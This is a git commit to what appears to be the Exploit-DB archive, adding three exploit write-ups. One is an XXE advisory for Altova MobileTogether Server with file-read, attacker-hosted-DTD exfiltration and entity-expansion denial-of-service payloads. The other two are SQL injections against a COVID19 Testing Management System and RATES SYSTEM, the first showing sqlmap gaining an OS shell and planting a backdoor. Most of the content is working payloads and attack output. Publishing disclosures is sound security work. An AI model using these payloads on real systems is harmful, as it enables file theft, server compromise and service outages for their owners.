DB: 2021-08-13
3 changes to exploits/shellcodes COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE) RATES SYSTEM 1.0 - 'Multiple' SQL Injections
This commit is contained in:
parent
38590ad9bd
commit
0025db717f
4 changed files with 472 additions and 0 deletions
344
exploits/multiple/webapps/50191.txt
Normal file
344
exploits/multiple/webapps/50191.txt
Normal file
|
@ -0,0 +1,344 @@
|
|||
# Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)
|
||||
# Date: 2021-08-10
|
||||
# Exploit Author: RedTeam Pentesting GmbH
|
||||
# Vendor Homepage: https://www.altova.com/mobiletogether-server
|
||||
# Version: 7.3
|
||||
# CVE: 2021-37425
|
||||
|
||||
Advisory: XML External Entity Expansion in MobileTogether Server
|
||||
|
||||
RedTeam Pentesting discovered a vulnerability in the MobileTogether
|
||||
server which allows users with access to at least one app to read
|
||||
arbitrary, non-binary files from the file system and perform server-side
|
||||
requests. The vulnerability can also be used to deny availability of the
|
||||
system. As an example, this advisory shows the compromise of the
|
||||
server's certificate and private key.
|
||||
|
||||
|
||||
Details
|
||||
=======
|
||||
|
||||
Product: MobileTogether Server
|
||||
Affected Versions: 7.0-7.3, potentially earlier versions as well
|
||||
Fixed Versions: 7.3 SP1
|
||||
Vulnerability Type: XML External and Exponential Entity Expansion
|
||||
Security Risk: medium
|
||||
Vendor URL: https://www.altova.com/mobiletogether-server
|
||||
Vendor Status: fixed version released
|
||||
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002
|
||||
Advisory Status: published
|
||||
CVE: CVE-2021-37425
|
||||
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425
|
||||
|
||||
|
||||
Introduction
|
||||
============
|
||||
|
||||
"MobileTogether Server is the processing powerhouse for your native iOS,
|
||||
Android, Windows, and browser-based apps.
|
||||
|
||||
MobileTogether Server is the back-end hub for your solutions and acts as
|
||||
a gateway between end-users and your back-end data sources and
|
||||
infrastructure."
|
||||
|
||||
(from the vendor's homepage)
|
||||
|
||||
|
||||
More Details
|
||||
============
|
||||
|
||||
MobileTogether Server is a back-end application hosting developed apps
|
||||
and provide access to various platforms and devices. Access to these
|
||||
apps is possible via native applications for devices and operating
|
||||
systems or directly via the browser. To access the MobileTogether
|
||||
server, depending on configuration either an anonymous login is possible
|
||||
or credentials are required.
|
||||
|
||||
During analysis of the communication between a MobileTogether client
|
||||
application on a smartphone and the MobileTogether Server, HTTP requests
|
||||
were observed containing JSON as well as XML data. Generally, the XML
|
||||
data is used to signal changes in the UI or user-supplied input for the
|
||||
app hosted in MobileTogether Server.
|
||||
|
||||
It was found that user-supplied XML external entities included in the
|
||||
described HTTP requests are resolved by the MobileTogether Server and
|
||||
the result is reflected in an HTTP response.
|
||||
|
||||
This behaviour allows to read local files, perform server-side requests
|
||||
and also deny the availability of the service through XML exponential
|
||||
entity expansion. However, file disclosure is limited to non-binary
|
||||
files and the absolute path needs to be known in advance.
|
||||
|
||||
|
||||
Proof of Concept
|
||||
================
|
||||
|
||||
MobileTogether Server comes with a series of example applications. To
|
||||
exploit the vulnerability, access to at least one application is
|
||||
required. In the following, the app EuroFXrates and the default user
|
||||
root with the default password root is used for demonstration of the
|
||||
vulnerability.
|
||||
|
||||
The following HTTP request contains the minimal data required to be
|
||||
accepted by the server resulting in the processing of the XML data
|
||||
stored within the JSON field InfoSetChanges/Changes (formatted for
|
||||
better readability):
|
||||
|
||||
------------------------------------------------------------------------
|
||||
POST /workflowmanagement HTTP/1.1
|
||||
Authorization: Basic cm9vdDpyb290
|
||||
Content-Type: application/json
|
||||
Content-Length: 851
|
||||
Host: 192.168.1.1:8085
|
||||
Connection: close
|
||||
|
||||
{
|
||||
"DeviceY": 0,
|
||||
"ClientVersionName": "7.2.2",
|
||||
"MobileManufacturer": "",
|
||||
"AllInfosetsSerialized": true,
|
||||
"ServerName": "192.168.1.1",
|
||||
"ProtocolVersionMax": "2",
|
||||
"Language": "en-US",
|
||||
"DeviceType": "",
|
||||
"ClientKey": "1_11148009037086584903_2744738433663963458",
|
||||
"DeviceXDPI": 0,
|
||||
"DeviceYDPI": 0,
|
||||
"DeviceYCanvasWithTabs": 0,
|
||||
"ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
|
||||
"ProtocolVersionMin": "2",
|
||||
"DeviceXCanvas": 0,
|
||||
"ClientArchiveVersionMin": "-74",
|
||||
"MobileOSVersion": "Android 11",
|
||||
"DeviceXCanvasWithTabs": 0,
|
||||
"ClientArchiveVersionMax": "65",
|
||||
"User": "root",
|
||||
"DeviceX": 0,
|
||||
"DesignFileName": "/public/EuroFXrates",
|
||||
"EncValue": "M9EBc6-7P5cd0",
|
||||
"DeviceYCanvas": 0,
|
||||
"MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
|
||||
"InfosetChanges": [
|
||||
{
|
||||
"Changes": [
|
||||
{
|
||||
"": "<?xml version=\"1.0\" encoding=\"utf-8\"?>
|
||||
<Root>
|
||||
<SkipIntro>false</SkipIntro>
|
||||
</Root>"
|
||||
}
|
||||
],
|
||||
"ID": "$$PERS$$"
|
||||
}
|
||||
],
|
||||
"DeviceIsPortrait": true
|
||||
}
|
||||
------------------------------------------------------------------------
|
||||
|
||||
With the following XML data it can be verified that XML entities are
|
||||
resolved and reflected within predefined XML tags in the HTTP response:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE Root [
|
||||
<!ENTITY redteam "RedTeam Pentesting">
|
||||
]>
|
||||
<Root>
|
||||
<RedTeam>&redteam;</RedTeam>
|
||||
</Root>
|
||||
------------------------------------------------------------------------
|
||||
|
||||
The HTTP response contains the resolved XML entity:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
HTTP/1.1 200 OK
|
||||
Content-Type: text/html;charset=utf-8
|
||||
Server: CherryPy/18.1.0
|
||||
[...]
|
||||
|
||||
[...]
|
||||
<?xml version=\"1.0\" encoding=\"utf-8\"?>
|
||||
<Root>
|
||||
<RedTeam>RedTeam Pentesting</RedTeam>
|
||||
[...]
|
||||
------------------------------------------------------------------------
|
||||
|
||||
The following example shows how local files can be read from the server
|
||||
system hosting the MobileTogether Server on a Windows system:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE Root [
|
||||
<!ENTITY redteam SYSTEM "file://c:/windows/win.ini">
|
||||
]>
|
||||
<Root>
|
||||
<RedTeam>&redteam;</RedTeam>
|
||||
</Root>
|
||||
------------------------------------------------------------------------
|
||||
|
||||
The content of the file is shown below and formatted for better
|
||||
readability:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
HTTP/1.1 200 OK
|
||||
Content-Type: text/html;charset=utf-8
|
||||
Server: CherryPy/18.1.0
|
||||
[...]
|
||||
|
||||
[...]
|
||||
<?xml version=\"1.0\" encoding=\"utf-8\"?>
|
||||
<Root>
|
||||
<RedTeam>
|
||||
; for 16-bit app support
|
||||
[fonts]
|
||||
[extensions]
|
||||
[mci extensions]
|
||||
[files]
|
||||
[Mail]
|
||||
MAPI=1
|
||||
</RedTeam>
|
||||
[...]
|
||||
------------------------------------------------------------------------
|
||||
|
||||
One interesting target for attackers could be the configuration file for
|
||||
the MobileTogether Server residing at the following fixed location:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
|
||||
------------------------------------------------------------------------
|
||||
|
||||
For example, if the server supports HTTPS, the absolute path to the
|
||||
server's certificate and private key is stored in its configuration.
|
||||
|
||||
Furthermore, external XML entities can be used to access third-party
|
||||
websites as well as web services that are only available internally.
|
||||
Together with an externally hosted XML DTD, response information can be
|
||||
extracted:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE root [
|
||||
<!ENTITY % start "<![CDATA[">
|
||||
<!ENTITY % content SYSTEM "http://internal.example.com">
|
||||
<!ENTITY % end "]]>">
|
||||
<!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml"> % dtd; ]>
|
||||
<Root>
|
||||
<RedTeam>&redteam;</RedTeam>
|
||||
</Root>
|
||||
------------------------------------------------------------------------
|
||||
|
||||
The DTD contains the following information:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
<!ENTITY redteam "%start;%content;%end;">
|
||||
------------------------------------------------------------------------
|
||||
|
||||
In the HTTP response, the HTML markup delivered by internal.example.com
|
||||
is now visible.
|
||||
|
||||
A further vulnerability attacks the availability of the service through
|
||||
XML exponential entity expansion. This is demonstrated with the
|
||||
following XML document:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE root [
|
||||
<!ENTITY redteam0 "RedTeam Pentesting">
|
||||
<!ENTITY redteam1 "&redteam0; &redteam0;">
|
||||
<!ENTITY redteam2 "&redteam1; &redteam1;">
|
||||
<!ENTITY redteam3 "&redteam2; &redteam2;">
|
||||
<!ENTITY redteam4 "&redteam3; &redteam3;">
|
||||
<!ENTITY redteam5 "&redteam4; &redteam4;">
|
||||
<!ENTITY redteam6 "&redteam5; &redteam5;">
|
||||
<!ENTITY redteam7 "&redteam6; &redteam6;">
|
||||
<!ENTITY redteam8 "&redteam7; &redteam7;">
|
||||
<!ENTITY redteam9 "&redteam8; &redteam8;">
|
||||
<!ENTITY redteam10 "&redteam9; &redteam9;">
|
||||
<!ENTITY redteam11 "&redteam10; &redteam10;">
|
||||
<!ENTITY redteam12 "&redteam11; &redteam11;">
|
||||
<!ENTITY redteam13 "&redteam12; &redteam12;">
|
||||
<!ENTITY redteam14 "&redteam13; &redteam13;">
|
||||
<!ENTITY redteam15 "&redteam14; &redteam14;">
|
||||
<!ENTITY redteam16 "&redteam15; &redteam15;">
|
||||
<!ENTITY redteam17 "&redteam16; &redteam16;">
|
||||
<!ENTITY redteam18 "&redteam17; &redteam17;">
|
||||
<!ENTITY redteam19 "&redteam18; &redteam18;">
|
||||
<!ENTITY redteam20 "&redteam19; &redteam19;">
|
||||
]>
|
||||
<Root>
|
||||
<RedTeam>&redteam20;</RedTeam>
|
||||
</Root>
|
||||
------------------------------------------------------------------------
|
||||
|
||||
Sending the shown XML document leads to a huge server-side resource
|
||||
allocation which ultimately disrupts the availability of the
|
||||
MobileTogether Server.
|
||||
|
||||
|
||||
Workaround
|
||||
==========
|
||||
|
||||
None known.
|
||||
|
||||
|
||||
Fix
|
||||
===
|
||||
|
||||
According to the vendor, upgrading to version 7.3 SP1 resolves the
|
||||
vulnerability.
|
||||
|
||||
|
||||
Security Risk
|
||||
=============
|
||||
|
||||
Attackers in possession of an account for a MobileTogether Server with
|
||||
access to at least one app are able to read files from the server
|
||||
system, conduct HTTP requests to external and internal systems and can
|
||||
also deny the availability of the service. Access might also be possible
|
||||
through default credentials or the anonymous user.
|
||||
|
||||
|
||||
Timeline
|
||||
========
|
||||
|
||||
2021-06-21 Vulnerability identified
|
||||
2021-06-23 Requested a security contact from vendor
|
||||
2021-06-25 Security contact established with vendor
|
||||
2021-07-05 Customer approved disclosure to vendor
|
||||
2021-07-05 Vendor notified
|
||||
2021-07-20 Vendor acknowledged vulnerability
|
||||
2021-07-22 CVE ID requested
|
||||
2021-07-23 CVE ID assigned
|
||||
2021-07-28 Vendor released fixed version
|
||||
2021-08-10 Advisory released
|
||||
|
||||
|
||||
RedTeam Pentesting GmbH
|
||||
=======================
|
||||
|
||||
RedTeam Pentesting offers individual penetration tests performed by a
|
||||
team of specialised IT-security experts. Hereby, security weaknesses in
|
||||
company networks or products are uncovered and can be fixed immediately.
|
||||
|
||||
As there are only few experts in this field, RedTeam Pentesting wants to
|
||||
share its knowledge and enhance the public knowledge with research in
|
||||
security-related areas. The results are made available as public
|
||||
security advisories.
|
||||
|
||||
More information about RedTeam Pentesting can be found at:
|
||||
https://www.redteam-pentesting.de/
|
||||
|
||||
|
||||
Working at RedTeam Pentesting
|
||||
=============================
|
||||
|
||||
RedTeam Pentesting is looking for penetration testers to join our team
|
||||
in Aachen, Germany. If you are interested please visit:
|
||||
https://www.redteam-pentesting.de/jobs/
|
||||
|
||||
--
|
||||
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
||||
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
||||
52068 Aachen https://www.redteam-pentesting.de
|
||||
Germany Registergericht: Aachen HRB 14004
|
||||
Geschäftsführer: Patrick Hof, Jens Liebchen
|
45
exploits/php/webapps/50190.txt
Normal file
45
exploits/php/webapps/50190.txt
Normal file
|
@ -0,0 +1,45 @@
|
|||
# Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
|
||||
# Google Dork: intitle: "COVID19 Testing Management System"
|
||||
# Date: 09/08/2021
|
||||
# Exploit Author: Ashish Upsham
|
||||
# Vendor Homepage: https://phpgurukul.com
|
||||
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
|
||||
# Version: v1.0
|
||||
# Tested on: Windows
|
||||
|
||||
Description:
|
||||
|
||||
The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
|
||||
SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
|
||||
|
||||
==================== 1. SQLi ====================
|
||||
|
||||
http://192.168.0.107:80/covid-tms/patient-search-report.php
|
||||
|
||||
The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
|
||||
user has the full ability to run system commands via --os-shell and fully compromise the system
|
||||
|
||||
POST parameter 'searchdata' is vulnerable.
|
||||
|
||||
step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
|
||||
step 2 : Now copy the post request and save it as test.txt file.
|
||||
step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
|
||||
|
||||
----------------------------------------------------------------------
|
||||
Parameter: searchdata (POST)
|
||||
Type: time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 5 columns
|
||||
Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
|
||||
|
||||
[19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
|
||||
[19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
|
||||
[19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
|
||||
[19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
|
||||
os-shell> whoami
|
||||
do you want to retrieve the command standard output? [Y/n/a] y
|
||||
command standard output: 'laptop-ashish\ashish'
|
||||
os-shell>
|
80
exploits/php/webapps/50192.txt
Normal file
80
exploits/php/webapps/50192.txt
Normal file
|
@ -0,0 +1,80 @@
|
|||
# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
|
||||
# Date: 11-08-2021
|
||||
# Exploit Author: Halit AKAYDIN (hLtAkydn)
|
||||
# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
|
||||
# Version: V1.0
|
||||
# Category: Webapps
|
||||
# Tested on: Linux/Windows
|
||||
|
||||
# Description:
|
||||
# PHP Dashboards is prone to an SQL-injection vulnerability
|
||||
# because it fails to sufficiently sanitize user-supplied data before using
|
||||
# it in an SQL query.Exploiting this issue could allow an attacker to
|
||||
# compromise the application, access or modify data, or exploit latent
|
||||
# vulnerabilities in the underlying database.
|
||||
|
||||
# Vulnerable Request:
|
||||
|
||||
POST /register.php HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Length: 70
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://localhost
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-User: ?1
|
||||
Sec-Fetch-Dest: document
|
||||
Referer: http://localhost/register.php
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
|
||||
Connection: close
|
||||
|
||||
ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456®ister=
|
||||
|
||||
# Vulnerable Payload:
|
||||
# Parameter: ClientId (POST)
|
||||
# Type: time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
# Payload:
|
||||
|
||||
ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=®ister=oQCR
|
||||
|
||||
--------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Vulnerable Request:
|
||||
|
||||
POST /passwordreset.php HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Length: 61
|
||||
Cache-Control: max-age=0
|
||||
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
|
||||
sec-ch-ua-mobile: ?0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://localhost
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-User: ?1
|
||||
Sec-Fetch-Dest: document
|
||||
Referer: http://localhost/passwordreset.php
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
|
||||
Connection: close
|
||||
|
||||
loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
|
||||
|
||||
# Vulnerable Payload:
|
||||
# Parameter: loginId (POST)
|
||||
# Type: time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
# Payload:
|
||||
|
||||
loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX
|
|
@ -44319,3 +44319,6 @@ id,file,description,date,author,type,platform,port
|
|||
50186,exploits/php/webapps/50186.txt,"WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR",2021-08-10,Captain_hook,webapps,php,
|
||||
50187,exploits/php/webapps/50187.txt,"WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)",2021-08-10,"Aryan Chehreghani",webapps,php,
|
||||
50189,exploits/php/webapps/50189.txt,"Simple Library Management System 1.0 - 'rollno' SQL Injection",2021-08-10,"Halit AKAYDIN",webapps,php,
|
||||
50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",2021-08-12,"Ashish Upsham",webapps,php,
|
||||
50191,exploits/multiple/webapps/50191.txt,"Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)",2021-08-12,"RedTeam Pentesting GmbH",webapps,multiple,
|
||||
50192,exploits/php/webapps/50192.txt,"RATES SYSTEM 1.0 - 'Multiple' SQL Injections",2021-08-12,"Halit AKAYDIN",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue